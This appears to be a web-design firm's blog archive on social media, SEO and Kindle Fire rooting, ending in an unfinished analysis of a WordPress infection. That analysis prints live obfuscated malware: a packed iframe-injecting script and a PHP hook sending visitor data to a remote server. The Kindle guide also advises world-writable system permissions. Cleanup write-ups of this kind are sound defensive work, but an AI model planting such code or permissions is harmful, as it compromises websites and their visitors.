
Social Media Tips: Who Owns a Twitter Account-Name

Who owns a Twitter account name? When an employee tweets for a company, and is compensated for doing so as part of their “job”, who owns the account when the employee eventually leaves? A lawsuit between a blogger and a former employer over Twitter account ownership may lay some groundwork to finally answer this question. Unfortunately it is not a great test case, since the employment circumstances are a bit murky, as are the promises made over compensation. The real problem here is that account ownership was not clearly established from the beginning and there was no transition plan for when the employee eventually left the company. That is the big lesson to be learned from this case. Below I have outlined 5 steps to protect ownership of your company Twitter brand.

1. Your Twitter Account: For company Twitter account names, make sure your brand name is in it. For example, Comcast, Best Buy and ATT use Twitter names such as @comcastcares, @comcastvoices, @ATTTeamTatiana, @ATTcustomercare, @coral_BestBuy and @Gina_BestBuy. Note that Best Buy incorporated the individual’s name in the Twitter name along with the brand name. This personalizes the account and is a good idea as long as you clearly establish up front that the Twitter account is owned by the company.

2. Company email address: On Twitter the email address assigned to the account pretty much determines who has ultimate control of it. If the account is registered to a company-controlled email address, you control that mailbox, and should the employee leave you will be able to reset the Twitter password, retain control of the account, and even rename it if you want to. So make sure all company-related Twitter accounts are set up with company email addresses and not personal addresses such as Gmail, Yahoo, or Hotmail.

3. Written Agreement: Set up a written agreement clearly stating that the employee’s social media activities on behalf of the company are to be conducted on company-owned accounts and must follow company social media policies. See my previous blogs on 10 Practical Steps to Develop a Social Media Policy and Social Media Policy Examples and Best Practices.

4. Separate Personal and Business Social Media: Make sure your employees use your company social media accounts for business, and only for business, and use their personal accounts for all personal matters. While their personal accounts are private, make sure your social media policy prohibits use of company trademarks and discussion of company business on personal accounts.

5. Termination: Upon termination or an assignment change of an employee using company social media, make sure you do a debriefing and transfer usernames, passwords, and all other relevant information to the person who will be assuming the role going forward. You want this to be a seamless transition without any wrinkles or missteps along the way or afterward.


SEO Tips: Ideas for Creating Great Website and Blog Content

It is said over and over that “Content is King” for achieving top search rankings, but what exactly does that mean, and how do you create great content? Here are some quick SEO tips for developing great content for your website or blog.

1. Don’t Write What YOU Think They Want to Read: Website owners and bloggers often create content based on internal assumptions about what they think their consumers or visitors want to read or should be interested in. It is vital that your content addresses topics useful and interesting to your primary audience, at an appropriate level for their consumption and understanding. Look at potential topics, and the level they are written at, from the perspective of your typical consumer, not your own internal view of how it should be or what they should want to know.

2. No Selling, Telling, Shouting, Screaming (No Hype Zone): No one likes telemarketers, and ditto for websites and blogs that SCREAM BUY NOW! Shouting and screaming self-proclaimed achievements, features and benefits of your amazing new product, how your company is number one, or the industry leader in… destroys any credibility your blog or website may develop. Content that is overtly selling and making huge claims makes visitors immediately suspicious. Likewise, shallow content with a transparent cover to “sell” something is always detectable and will send visitors packing off to another site where they can find useful information. No matter how catchy the title or creative the pitch, people know when they are being led to the checkout cart, no matter how well disguised the tour guide is.

3. If You Think the Information is Too Valuable, It’s Perfect: Readers are looking for one thing when they come to a website: information. Readers do not want to read pages and pages of case studies that all brag about your Fortune 500 clients, nor how great you think your services or products are (see #2 above). Many bloggers and content writers or owners are reluctant to reveal “too much” for fear of “giving away” their secrets. However, the information you may be clinging to so tightly for fear of giving too much away is likely the content that will drive traffic to your site. For illustration’s sake, let’s say George has a legal consulting website. George regularly offers very useful, authoritative legal information and how-tos in his website blog: things like what to do or say, or not do or say, when questioned by law enforcement, or how to file certain complicated court forms or claims, and so on. When one of his loyal readers, who has never hired George before, needs serious legal consultation, is he or she going to scour his site for an article or blog about the situation and say, “Thanks for the free advice, George, now I don’t have to hire you”? On the contrary: because George regularly provides helpful, inside advice about legal matters, he not only gains trust, he establishes himself as a leading authority in his profession. It’s as simple as this: the more unselfishly information is given away, the more readers and customers will instinctively trust you and your business or blog, and the more your business or blog will be seen as an authoritative source and a “good” business.

4. Unique Content: It is vital that your blog posts and web page content are unique and not copied from somewhere else on your website or, worse, from another website! Duplicate content will get you penalized by Google and hurt your search results; Google assigns the top rank to the oldest content and penalizes the copycats. In addition, duplicate content from a site or source other than your own material is plagiarism and could also be a copyright violation, which can cause more serious problems than a dip in search results, so create your own stuff.

5. Keyword Stuffing (great idea, NOT really): If you don’t know much about SEO, know this: SEO is not just about inserting a few keywords into a blog or webpage. Google does not base search results upon a magic number of keywords in website content. A few clever words, or repeating some keywords according to some magic SEO recipe, will not get your site or blog ranking. In fact there are over 240 factors used in the Google algorithm; no one knows the exact number, and only about 50 factors have been reverse engineered by deduction. The algorithm itself is secret and as well guarded as the Coke recipe. Does stuffing or repeating keywords work? Stuffing content, forcing keywords into a post or page, creates unnatural content that is hard to read and follow. It is usually obvious to both readers and Google, and both will ignore content like this. The overall quality of content is more important to both readers and Google than the number of keywords used (look up the Panda updates if you think otherwise).

6. Page Content (at least 200 to 300 words): Pages with very little content don’t provide much information to visitors, nor do they give the search engines much to index and digest. Both Google and visitors view pages with minimal text content as having little value and poor quality/authority. Make sure your key pages, the homepage and second-level pages at a minimum, have at least 200 to 300 words per page.

7. Make it Relevant: Make sure the page content is relevant to your overall website and focused on the topic for that page. The page title and content should relate to each other and be focused on a particular topic. It is better to have several highly focused pages than a few pages that are very general, covering a wide range of topics but not in detail.

8. Page and Website Structure: This is key to creating a high-ranking website and page. We could write an entire blog on this one item alone. For now, we will leave it at: follow good design practices, make sure your title, description, H1 and H2, etc. are done correctly and that all are relevant to the page content. Surprisingly this is one of the most overlooked aspects of on-site SEO. A webpage and website can look great and be completely non-functional from an SEO standpoint.

We have met many who think that a great website with great content will eventually rank on its own. In a perfect world this may be true, but the fact is that the internet is highly competitive, and if you rely strictly on the content on your website and in-house SEO skills your website will not be competitive. Your more aggressive and ambitious competitors certainly have SEO campaigns running; it is impossible to compete against well-done SEO with website content alone, and frankly, in-house teams can rarely compete against a good professional SEO team. SEO is not something that can be learned overnight; there is much, much more to SEO than most realize. The best SEO tip is to hire a professional to either do your search engine optimization or advise your in-house webmaster and website team on how to optimize your website and blog.


Install Android Marketplace and Google Apps on Amazon Kindle Fire

The first thing the Amazon Kindle Fire is missing is the Google Framework API; it works on Amazon’s API instead. This limits many of the things you can do with your device. Not only is the fix easy, it doesn’t even require root access to the device. You just need to enable installation of outside applications. More advanced applications like the Android Market and Calendar do require complex configuration, so for those of you who just want your apps to work now, here is…

The Quick and Dirty Step by Step:

1. Menu -> Settings -> Device -> Allow Installation of Applications -> On.
2. Install file management software: Root Explorer, ES File Explorer or Dropbox.
3. Find the app you want to use on your previous Android device, or online.
   Option 1: Install Astro on your Android device and use the “Backup” feature to create an APK on your SD card. Make sure that you set up Astro to use the SD card: File Manager -> Menu Button -> Preferences -> Backup Directory -> Browse Folder /mnt/sdcard-ext.
   Option 2: Find an APK online.
4. Copy the contents to your PC’s hard disk. Download the file Kindle Google Apps, which contains many common Google apps you probably want to use, and also download this key file: GoogleFrameworkServices.apk.
5. Copy the contents of these to your Kindle Fire, most importantly GoogleFrameworkServices.apk. You can skip the copying step if you copy the files on your PC to your Dropbox folder and open them on your Kindle Fire.
6. Open ES File Explorer or Dropbox to find the files you have copied.
7. Open GoogleFrameworkServices.apk and install it. If you are having trouble with this step, try using the Amazon App Store app “EasyInstaller”. Just remembered that worked for me. I did not need root for this step. Try rebooting your device before installing also; rebooting the Kindle seems to solve a lot of problems when loading the APKs.
8. Restart your Kindle.
9. Install Gmail or any other Google app that requires a sign-on. Sign on to Google.
10. Install the rest of your software (it will use your primary Google account).
11. Restart your Kindle. Enjoy!

Thanks to XDA Forums for the methods and troubleshooting and Sasha Segan from PC Mag for the initial intro on how to do it!

For the More Advanced and Adventurous: Installing the Google Android Market

1. Download and install the Android SDK.
2. Update the Android SDK to the latest version, including USB drivers. If you have trouble updating the Android SDK, try closing everything, navigating to the folder in a command prompt, and running android.bat out of the /tools folder. Thanks Mobile World for this fix.
3. Configure your %USERPROFILE%/.android/adb_usb.ini to include “0x1949”. Note: if the file or the folder do not exist, you MUST create it! Input it without the “”.
4. In the command prompt (Windows + R, type cmd, press Enter) navigate to your Android SDK install directory under platform-tools (cd /program files (x86)/android/platform-tools/) and run adb kill-server, then adb devices to check whether your Amazon Kindle shows up.
5. If the driver doesn’t work, replace your android_winusb.inf with this one. You will then have to update the driver for your device (in Device Manager, look for your Kindle with an exclamation mark on it, inspect it and click Update Driver… then navigate to where the android_winusb.inf is in your Android SDK directory).
6. If your Kindle is visible in ADB, download SuperOneClick v2.1.1.
7. Run it and root your phone.
8. Use Root Explorer (can buy from Amazon App Store) to copy a Market APK backup to /system/apps. Click the R/O button to R/W if you can’t copy properly.
9. Use Root Explorer to CHMOD /system/apps to full access (777).
10. Run the Market APK from the /system/apps directory.
11. Install the Market APK.
12. Restart the Kindle Fire. You should be able to install applications now!

Installing Google Calendar Sync

Another tough one is Google Calendar Sync. You can just install the app, but it won’t connect to your Google account. You need these two files: Google Calendar APKs. The technique is pretty simple, and similar to the Android Market installation. Using Root Explorer you need to copy GoogleCalendarSyncAdapter.apk into /system/apps and change its permissions to 777 or full open. Then you can run the Calendar.apk and install it. On reboot, you should have your calendar syncing with your Kindle! Congrats!

Thanks Technipages for helping me realize I was missing the adb_usb.ini file! All problems solved! Now it is a real tablet! A really cheap tablet to boot!


Adobe mobile Flash Abandoned, Impact on PC Flash and Web Design

What is the impact of Adobe abandoning mobile Flash? Actually, abandoning Flash for mobile is not really a big deal in itself; what is a big deal is what this move likely means for the future of Flash on all platforms, PC included. Apple has been a Flash antagonist, and Microsoft joined the Flash opposition with IE 10 and Windows 8, declaring it is time for the Web to move on (ouch). With this, the demise of the antiquated PC Flash platform can’t be far behind. In fact, Adobe already has the replacement for Flash in the works, Edge, which is scheduled for launch in 2012. Adobe has finally embraced web design standards such as CSS, although a bit late in the game. CNET has a great article on this with more details, Adobe Abandons Flash Plugin For Mobile. For a more technical assessment of this see Alex’s post The Internet Progresses as Adobe Abandons Flash.

Flash was amazing when it first launched; it brought animation and graphics to life on what was a lifeless internet at the time. Since then HTML 5, CSS, and other languages have advanced and made Flash much less relevant and, more importantly, provided better options for animation and video. Add to the mix that Flash is horrible for SEO and effectively invisible to search engines, and there are huge disadvantages and disincentives for using Flash. With today’s announcement from Adobe, Flash for website design is now a dead language, like Latin, and it is time to move on to better options. We use HTML 5, CSS and other SEO-friendly languages for all of our website development and applications. In fact we have been very busy lately converting Flash video and Flash animations to HTML for some clients that still have them on their websites, so their websites will be iPad and mobile compatible.


How to Connect Website Badge / Link to Google+ Business Page

For those of you who skipped configuring your badge for Google+ Pages and can’t find the option anymore, use the following link: https://developers.google.com/+/plugins/badge/config

Type in your page’s ID and you will be able to create it again. You can see it live at esotech.org in the footer and also in the breadcrumb on inner pages. You will have to add a bit of code to your header, and then use the link wherever you like. The link seems highly customizable if you know what you are doing. For example, setting the height and width of the icon shouldn’t be a problem. Here is a code snippet example for Esotech’s page:

<!-- Place this tag in the <head> of your document -->
<link href="https://plus.google.com/103467698593383507666/" rel="publisher" />

<!-- Place this tag where you want the badge to render -->
<a href="https://plus.google.com/103467698593383507666/?prsrc=3" style="text-decoration: none;">
  <img src="https://ssl.gstatic.com/images/icons/gplus-64.png" width="64" height="64" style="border: 0;" alt="Google+" />
</a>


Social Media Enhances and Complements SEO, like Yin and Yang

The argument that Social Media will ultimately kill SEO is an amusing one. Yes, Social Media will dramatically change SEO; in fact it already has changed it forever; but Social Media will not replace SEO. SEO and Social Media have a Yin Yang relationship: opposite forces that complement each other within a greater whole. I think Social Media is the most exciting thing that has happened to SEO in many years, and it will significantly improve the relevance and quality of search results.

Social media, combined with the Google Panda update, and eventually Google +1, have changed the landscape of search rankings. The Panda update made great strides toward better rankings based on quality content, pushing down the rankings for content farms and junk content. Google +1 will eventually reward highly regarded sites with quality content with higher rankings. Social Media in a similar fashion will reward websites with quality blogs, great content and engagement via Social Media with higher search rankings, higher website traffic and greatly expanded exposure. Panda, Google +1 and Social Media are paving the way to more democratic search results based on user likes and interests, and much less influenced by those who game the system. So with that said, it would appear that SEO is in fact on its way to extinction, but this is far from true. Yes, old school SEO of mindless link building is already on its way out and is only marginally effective today. However, there is now a huge demand for Web 2.0 SEO utilizing best practices of website SEO combined with SMO (Social Media Optimization). Organizations still have a need, in fact now more than ever, for high quality SEO, and thanks to these developments quality content and engagement will be rewarded and spam will be ranked accordingly. So how does Social Media figure into this, and what is the Social Media and SEO Yin Yang relationship?

The purpose of SEO is to get your content found, BUT the presumption and requirement is that someone is looking for that particular content in the first place. If so, then SEO works beautifully. SEO relies on people proactively searching for words associated with your product, service, or organization. SEO is reactive to a proactive user. Social Media has evolved from personal chatter between close friends to sharing news, discussion, debate, and education across diverse groups. Sharing and discussion are driving the viral effect of Social Media, and this is the link between SEO and Social Media. There is a 24/7 discussion raging on Twitter, Google Plus, Facebook and LinkedIn about everything from politics to music, news, movies, and products. These discussions often share links to blogs, websites, Facebook Pages, and other posts, and these posts are often re-shared and commented on. Sharing and the viral effect of Social Media make it proactive in the sense that the message/discussion is reaching people who weren’t necessarily looking for that in particular. This is how Social Media is complementary to SEO. Social Media actively reaches out to and engages users, while SEO relies on users to actively search for content. This is the Yin Yang relationship of SEO and Social Media and why the two are complementary to each other.

Social Media is now an essential part of a comprehensive digital marketing strategy, along with an SEO campaign designed to work with and complement social media. With Social Media becoming an essential element of a Digital Marketing Strategy and SEO campaign, a new term has been coined to label SEO work specifically focused on Social Media, and that is Social Media Optimization or SMO. To develop and implement a successful Digital Marketing Strategy today one must employ top notch SEO, with high quality content, and a lively and interesting SMO/Social Media campaign. More on that in a future blog…


Reputation Repair & Management, Learn from the Worst and be the Best

Reputation repair and reputation management is a hot topic today as social media and blogs explode in popularity. Social media is making it increasingly easy for an irate client, customer, or employee to smear your company name and make it very public. In fact, without a great deal of skill it is fairly easy to create negative content via social media and blogs that will rank in Google or Bing searches such as Company Name Scam or Brand Name Scam. On Twitter the popular hashtags for this are #FAIL, to indicate a company or brand has really screwed up, or #LAME for a less offensive, but still stupid, move. So how does one go about actually implementing a reputation repair campaign? Below are our 7 Steps for Reputation Management, or How to Do Reputation Repair, but first let’s explore the issue and the challenges.

Google and Bing search engines are giant calculators: they run huge algorithms to analyze content and webpages to determine credibility, authority and content quality, along with over 200 other factors, to arrive at a search rank for specific keywords. Thus a blog with Your Company Name Scam in it, along with a few keywords, will rank at the top of that search result in the absence of any competing content. Likewise, dozens of blogs with Your Company Name Scam will dominate the first and second page of search results, a potential disaster for your reputation! Add websites like Ripoff Report and press releases or public records for litigation, and it is easy enough to have an ugly page one of search results.

The best way to learn how to conduct a great reputation management or reputation repair campaign is to look at some companies that have had severe image or reputation problems (many well earned, by the way) to see how they turned this around. The simple answer is content, content, and more content, but successful implementation is actually more complex than that. The picture I chose for this post illustrates the point well: it is a matter of counteracting and displacing the negative content with your positive content. Content is absolutely vital, and it is equally important that the content is published with the right keywords and on blogs or websites where the search engine spiders will find the content and index it. There is a bit of art to selecting the right keywords; to borrow a phrase from George Orwell’s book, it is “double speak”. For example, to rank against Your Company Name Scam, you would write blogs with those negative keywords in the content, BUT in a positive context. To illustrate this I wrote a blog a couple of weeks ago titled “SEO Scams, You Need a New Website, Is this Really a Scam?”. If you do a Google search for Esotech Scam this turns up on page one in several positions. Thankfully no posts about other companies with similar names have any negative posts, and this is all positive for our firm and illustrates the point well.

How to Do Reputation Repair, 7 Steps for Reputation Management

1. Research: Do Google and Bing searches for your organization name, brand names and key management. List any keywords or phrases that need attention. Google and Bing search each name and phrase. Google and Bing search each name with scam, sucks, ripoff, etc. in the search terms.

2. Identify Keywords: Make a list of words and phrases that either are causing a problem or could cause one in the future. Offending Keywords: list all of the keywords and phrases that showed up in your research above. Be sure to list exactly how each showed up in search results and exactly what you searched for. Potentially Offensive or Harmful Words: list words that are likely choices or targets for complaints or a campaign against your brand or name.

3. Develop Content Strategy: This is a very critical step. This is where you develop your content strategy to either combat and attack an existing problem or defend against potential attacks in the future. Use the research and keyword list from above to develop your content strategy: identify blog topics and keywords, identify article topics and keywords, and plan social media posts and content to leverage the above.

4. Implement Social Media and Blogging: With your research and keywords identified and your content strategy in place, now it’s time to implement your campaign. Quality content is vital for a successful campaign; make sure you create quality content consistently to achieve the best results.

5. Crisis Plan: Develop a crisis plan. What will you do if something goes wrong in your business? How will you respond? Who will respond?

6. Monitor: Low-cost/free option: set up Google Alerts for Your Company Name Scam, Sucks, Ripoff, #Fail, etc., and also the same for your personal name, key managers, and brand names. Paid monitoring: you can use systems like Radian6 to monitor chatter on social networks, blogs and new search results for your brand. These platforms offer a comprehensive solution to social media monitoring; however, they are not cheap and generally start at several hundred dollars per month for basic service.

7. Be Proactive and Respond Promptly: Now that your campaign is in place and rolling, it is vital that you respond to posts, comments and complaints promptly. It is also important to be proactive and act immediately if something happens and get out in front of the problem. Don’t wait for the tsunami of complaints or jeers; be proactive and get in front of your clients, consumers, or constituents immediately.


Social Media Policy Examples and Best Practices

My previous post discussed How to Develop a Social Media Policy; as promised, this post provides some great examples of social media policy along with links to policies from dozens of organizations across a range of industries.

Social Media Policy Examples

My two favorite social media policy examples are Intel and Ford (see infographic below). I like the Intel policy because it is easy to read, focuses on a common sense approach, is practical, and at the same time is very comprehensive without being overly authoritarian or rigid. I like the Ford policy first and foremost because they employed a very cool infographic that will cause people to actually read and use it (clever concept, guys), and secondly because it has great content and is a good policy. Below the Ford infographic is a link to a great blog by Social Media Today with a list of over 100 examples of social media policies. Some of the links are now broken, but it is still a great resource.

Intel Social Media Policy

Ford Social Media Guidelines

Over 100 Examples of Social Media Policies, via Social Media Today and Social Governance.


How to Develop a Social Media Policy in 10 Practical Steps

As social media has exploded over the last few years, organization policies have not kept pace. In fact, until recently few organizations had formal social media policies, and today the majority still do not have one. Among the organizations that have tackled this challenge there are three lines of thinking on social media policy:

Comprehensive Policy: This camp believes social media policies should be comprehensive, with strict rules for employee use and content. Comprehensive social media policies often require approvals for blogs, posts, and content and involve strict oversight to ensure compliance with company policies, branding, and marketing messaging.

Broad Guidelines: This approach favors establishing broad guidelines for employee use of, and content on, organization social networks, websites, and blogs. It relies on common sense on the part of both management and staff, as well as trust. Another line of thinking with this approach is that existing organization policies already cover, or can cover, employee behavior and actions. Note that with this approach you should review and update your existing policies to cover social media use and content.

Laissez-faire: The thinking here is that there is no need for an organization social media policy, or that existing policies sufficiently cover this. This is a common approach in small and mid-size companies and organizations with an entrepreneurial culture.

What are my recommendations for developing a social media policy? Personally I favor the approach of developing guidelines for social media use. My feeling is that strict rules inhibit creativity and kill any real conversation, resulting in stiff, uninteresting content that is pretty much corporate speak. In addition it is very difficult to manage and enforce a strict policy where every post or blog must be approved.

10 Steps to Developing a Social Media Policy

1. Determine which approach your organization will employ: Comprehensive (strict) Policy or Social Media Guidelines (obviously those electing the third approach of no policy are already finished). This seems simple enough, but for large organizations there could be different points of view as to what approach is best and what is required. Make sure you involve all who will have a stake in this.

2. Review existing organization policies: Do they conform to the current environment and law? Can existing policies be updated to cover social media, or does your organization need a separate policy?

3. Determine Key Policy Issues: What are you trying to accomplish, prevent, or control? I recommend writing an outline of the key issues for your organization. Again, for large organizations different departments will have very different concerns; make sure you solicit input and involvement from the appropriate departments or management. For example, the concerns of the marketing department will be very different from those of the legal and HR departments.

4. Research: Review other social media policies (learn from those that have been down this path; my next blog will have a list with links to examples of social media policies).

5. Legal: Yes, depending upon the size and scope of your organization, legal and HR review may be required. The obvious legal questions are privacy and free speech, but there are also important issues such as trademark use, copyright, etc. Review NLRB rulings on social media and employee personal use, as these are the new rules of the road.

6. Develop your Social Media Policy: Write your policy, keep it brief and succinct, and use examples where possible.

7. Training and Use Guidelines: This is a key part of your policy. Regardless of how well written your policy is, it is useless if your team is not well trained in social media and does not clearly understand your objectives. Your training needs to include managers, HR, and others who may be involved in managing social media activities and explaining the policy. Your entire management team should be familiar with the policy.

8. Implementation: Time to roll it out and walk the talk.

9. Engage: Oddly and sadly, this is where many fail. Social media is all about engagement, actually talking to people and responding to them. A one-way outbound billboard campaign will not engage the community. Your campaign must be a two-way interactive dialog. This topic alone is an entire blog; more on this later…

10. Monitor: Monitor sounds ominous, but in this context it is a good practice. It is vital that you monitor your social media campaign. The discussion on your Facebook page, Twitter, and blog posts is your best and most immediate barometer of how your customers feel about your organization or brand and what they want. It is your best feedback mechanism; make sure you take advantage of it and have a system in place to share the results and feedback with management. By monitoring the campaign you can adjust your course if necessary, change the tone and content if necessary, and expand on what is working. Of course, monitoring is of little use if you don’t have a reporting system. Make sure you have a reporting system established as part of your policy, where key management is kept up to date on your organization’s social media and what is going on in the world.


Complex WordPress Header Javascript and IFrame Injection Problem, Solution and Analysis

While working on a development site that had sat idle for a while before any actual work was done, we noticed that some kind of iframe injection had occurred. There was no trace of it in the database or the server code: nothing that said iframe, nothing that added extra scripts. This was a brand new website, a template from scratch with no plugins and no content… I was pulling my hair out, but slowly started getting on to the situation, and with the help of Mike Brich from HavenLight Software got right down to it after hours of investigation and head scratching. This post will be very code intensive, but with full explanations. Just a warning, I am jumping right into it!!

Overview

Bottom line, this is how it works:

1. Something injects code into wp-settings.php.
2. The function counter_wordpress is decoded and sends a cURL request to a third-party server with your computer info.
3. The third-party server sends back a string, which the function echoes into the page, injecting JavaScript.
4. The JavaScript communicates with yet another server and injects an iframe.
5. The iframe injects all sorts of other scripts, popups, Java programs, and other iframes from other servers.
6. The cURL'd server logs your IP and computer information, and the next time you visit it hides itself, or withholds its payload, for a while.
7. Repeat.

The Problem

The iframe injection did not appear in my browsers, or in any other browser in my office. It seemed to appear only in browsers coming from an IP that hadn't encountered it before, or at least hadn't for a while. On success or failure of delivering its payload, it hid! Not only from machines, but from bots too: Googlebot and Google's malware scans saw nothing coming from this site. It was bizarre. I scanned the source code of the entire WordPress install for any traces of traditional injections or iframes, but there were none. There was nothing in the database either. I disabled and removed all plugins, and it was still there.
The behavior of the code was strange as well: it would load the script, show a "Java wants to run" warning, then on refresh start loading data from various sources as the iframe was inserted. I found out later that the script had a 5 second delay before loading the iframe, which didn't allow me to catch it as I was refreshing, and also, I am sure, helps it avoid automated scans, including Google's malware scans. After loading once it would disappear, never to return. I couldn't see it; however, something interesting started to happen. Refreshing the page over and over, the source code showed an error that appeared on the site right where the original injection occurred, right before the closing </head>:

```html
<html>
<head>
<title>The page is temporarily unavailable</title>
<style>
body { font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body bgcolor="white" text="black">
<table width="100%" height="100%">
<tr>
<td align="center" valign="middle">
The page you are looking for is temporarily unavailable.<br/>
Please try again later.
</td>
</tr>
</table>
</body>
</html>
```

This made it seem as if another website was loading inside mine, since the opening and closing html tags were a dead giveaway. I started to search for this issue and pretty quickly found out that this was an error message from a web server running nginx, an open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server, meant for servers with limited system resources. The server was erroring out; perhaps too many sites are connected at once and it's DoSing itself. So, confirmed: my website is loading another website in its header. This is the code that was being used. Please be careful and do not click on any links in this document that are in code blocks.
```html
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|345|500|sokistatehouse|src|http|'.split('|'),0,{}))</script>
<IFRAME style="display:none" SRC="http://finderonlinesearch.com/tds/in.cgi?5&user=mexx" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME><meta name="Cart66Version" content="Professional 1.2.2" />
</head>
```

It is messy code, difficult to understand with the naked eye. Why? Because, as Mike found out, it's packed. Here is what it looks like unpacked:

```javascript
function MakeFrameEx() {
    element = document.getElementById('yahoo_api');
    if (!element) {
        var el = document.createElement('iframe');
        document.body.appendChild(el);
        el.id = 'yahoo_api';
        el.style.width = '1px';
        el.style.height = '1px';
        el.style.display = 'none';
        el.src = 'http://hardpancakes.xe.cx/showthread.php?t=72291731'
    }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1 && ua.indexOf("webtv") == -1)) && ua.indexOf("windows") != -1) {
    var t = setTimeout("MakeFrameEx()", 500)
}
```

Interesting URL! Where does it go? Interestingly enough, to a 404 page on an nginx server, as suspected. So where is the iframe, and where the hell is this packed JavaScript function getting loaded into the header? Now I go back to my searches: I can't find any mention of the iframe URL, the newly decoded URL, or even "MakeFrameEx" anywhere in the source code.
So I decided to search again for anything with the words wp_head, which can be done like this:

```sh
# grep -Rin 'wp_head' yourdirectory
```

I looked again at the function "counter_wordpress" that I had overlooked as a valid system file, one that just looked overly complex (I thought it was part of wordpress.com's tracker). It wasn't. This is the function that was sitting right above do_action('init') in wp-settings.php:

```php
function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
```

There it is: a ridiculously over-encoded piece of code that gets injected into wp_head. I am going to move on to the solution now, and then go back to analyze this bit of code and pose some questions, because I still can't answer precisely how it got in there in the first place.

The Solution

Firstly, go to your main WordPress directory and type:

```sh
# ls -al
```

Take note of any files that have changed recently versus others. Most of your WordPress config files should have the same modified date, except maybe wp-config.php. wp-settings.php is the file I found infected, but you may find it elsewhere.
Remove the function counter_wordpress(), including its WordPress hook add_action('wp_head', 'counter_wordpress');. If you do not have this function in your wp-settings.php it may show up somewhere else, but you can be sure that it will be followed by an add_action('wp_head', 'function_name'); that is not supposed to be there. Find it and remove it immediately. If you cannot find the code in the wp-settings.php file I suggest running the following command:

```sh
# grep -Rin 'wp_head' yourdirectory
```

where yourdirectory is the directory in question. This will give you a list of files, line numbers, and code where wp_head exists in your install, which is a requirement for the code to install itself… (imagine if they had encoded THAT and evaled it; it would be impossible to find.) After removing this function you should find that your error message, injected JavaScript and injected iframes all stop loading. After you remove the function, check your permissions in your WordPress root directory and all other directories, and make sure they are set to 755 or even more stringent. Mine were not, and I suspect that some other WordPress vulnerability took advantage of that, though I cannot identify it.

The Analysis

Let's dig deeper: how does this thing work?
It is obfuscated after all… Here is the PHP function, a bit more legible:

```php
function counter_wordpress() {
    $_F = __FILE__;
    $_X = 'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
    eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
    $ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
    $ip = $_SERVER['REMOTE_ADDR'];
    $host = $_SERVER['HTTP_HOST'];
    $uri = urlencode($_SERVER['REQUEST_URI']);
    $ref = urlencode($_SERVER['HTTP_REFERER']);
    $url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 2);
    $re = curl_exec($ch);
    curl_close($ch);
    echo $re;
}
add_action('wp_head', 'counter_wordpress');
```

As we can see, this is an average cURL operation, but where is it sending to? We have all the params but the URL, which is concatenated from… somewhere… Actually it has a lot to do with that variable $_X, which is encoded about 3 or 4 times, as you will see.

Evaluation Process

This is the process of evaluation:

1. $_X = an encoded string.
2. Another string (the base64 inside the eval) is decoded; it operates on $_X.
3. Inside that code, $_X is base64-decoded, revealing another encoded form of it.
4. Inside that same code, the newly decoded $_X is run through the strtr function, which replaces letters and numbers with other letters and numbers.
5. Inside that same code, $_R is set by running ereg_replace over $_X (substituting the quoted value of $_F for __FILE__).
6. Inside that same code, $_R is evaluated.
7. Inside that same code, $_R and $_X are set to 0 so you can't echo them outside of the encoding.
Then the entire thing is evaluated, giving you $url.

Evaluation Breakdown

Let's break it down:

```php
$_F=__FILE__;
```

Layer 1:

```php
$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
